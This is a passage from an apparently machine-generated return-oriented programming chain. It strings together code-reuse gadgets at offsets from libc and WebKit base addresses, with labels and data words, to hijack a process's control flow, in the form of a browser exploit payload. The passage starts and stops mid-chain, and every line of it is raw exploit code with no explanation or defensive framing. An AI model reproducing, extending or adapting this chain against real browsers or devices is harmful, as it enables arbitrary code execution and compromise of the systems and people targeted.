libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+190344, //L3074
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+190360, //L3075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+190328, //L3073
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3073:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3074:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3075:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+190520, //L3079
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+190488, //L3077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+190504, //L3078
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3076:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3077:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3078:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3079:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+190576, //L3081
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3081:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+190704, //L3083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+190720, //L3084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+190688, //L3082
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3082:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3083:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3084:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+190816, //L3086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+190800, //L3085
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3085:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3086:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3087:
db([48, 0]); // 0x30
set_gadget(libc_base+763368,); //pop rcx
//L3088:
db([48, 0]); // 0x30
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+191040, //L3090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+191056, //L3091
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+191024, //L3089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3089:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3090:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3091:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+191168, //L3092
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+191200, //L3094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+191184, //L3093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3092:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3093:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3094:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+191344, //L3097
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+191328, //L3096
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3095:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3096:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3097:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+191408, //L3098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3098:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3100:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+191488, //L3102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3102:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+191528, //L3101
//L3011:
libc_base+782311, //pop rsp
ropchain+191544, //L3104
//L3101:
libc_base+782311, //pop rsp
ropchain+185640, //L2957
//L3104:
libc_base+764760, //pop rsi
ropchain+191584, //L3105
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3105:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3107:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+191704, //L3110
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+191688, //L3108
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3108:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3110:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+191880, //L3113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+191896, //L3114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+191848, //L3111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+191864, //L3112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3111:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3112:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3113:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3114:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+192056, //L3118
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+192024, //L3116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+192040, //L3117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3115:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3116:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3117:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3118:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+192176, //L3119
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+192208, //L3121
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+192192, //L3120
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3119:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3120:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3121:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+192312, //L3122
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+192328, //L3123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L3122:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3123:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+192448, //L3124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+192432, //L3125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3125:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3124:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+192536, //L3127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+192520, //L3126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3126:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3127:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+192640, //L3128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+192656, //L3129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L3128:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3129:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+192776, //L3130
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+192760, //L3131
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3131:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3130:
db([0, 0]); // 0x0
//__out_rev:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+192848, //L3133
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L3133:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+192912, //L3135
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L3135:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([16, 0]); // 0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3136:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3138:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+193080, //L3141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+193064, //L3139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3139:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3141:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+193168, //L3142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+193184, //L3144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3142:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3144:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3145:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L3147:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+193344, //L3150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+193328, //L3148
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3148:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3150:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+193520, //L3153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+193536, //L3154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+193488, //L3151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+193504, //L3152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3151:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3152:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3153:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3154:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+193632, //L3156
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+193616, //L3155
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3155:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3156:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3157:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3158:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L3159:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+193832, //L3161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3161:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+193888, //L3162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3162:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+194024, //L3166
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+194008, //L3165
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3164:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3165:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3166:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+194144, //L3169
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+194112, //L3167
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3167:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3168:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3169:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+194280, //L3171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+194296, //L3172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+194264, //L3170
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3170:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3171:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3172:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+194456, //L3177
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+194472, //L3178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+194408, //L3174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3174:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3175:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3176:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3177:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3178:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+194584, //L3179+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+194576, //L3179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3179:
db([0, 0]); // 0x0
set_gadgets([
ropchain+194600, //L3179+24
ropchain+195952, //L3173
libc_base+764760, //pop rsi
ropchain+194640, //L3180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3180:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3182:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+194760, //L3185
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+194744, //L3183
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3183:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3185:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+194936, //L3188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+194952, //L3189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+194904, //L3186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+194920, //L3187
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3186:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3187:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3188:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3189:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+195048, //L3191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+195032, //L3190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3190:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3191:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3192:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3193:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3194:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+195248, //L3196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3196:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+195304, //L3197
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3197:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+195440, //L3201
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+195424, //L3200
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3199:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3200:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3201:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+195560, //L3204
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+195528, //L3202
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3202:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3203:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3204:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+195696, //L3206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+195712, //L3207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+195680, //L3205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3205:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3206:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3207:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+195856, //L3210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+195872, //L3211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+195824, //L3208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3208:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3209:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3210:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3211:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+195944, //L3212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3212:
db([0, 0]); // 0x0
//L3173:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+196072, //L3215
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+196088, //L3216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+196056, //L3214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3214:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3215:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3216:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+196200, //L3218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+196248, //L3221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+196216, //L3219
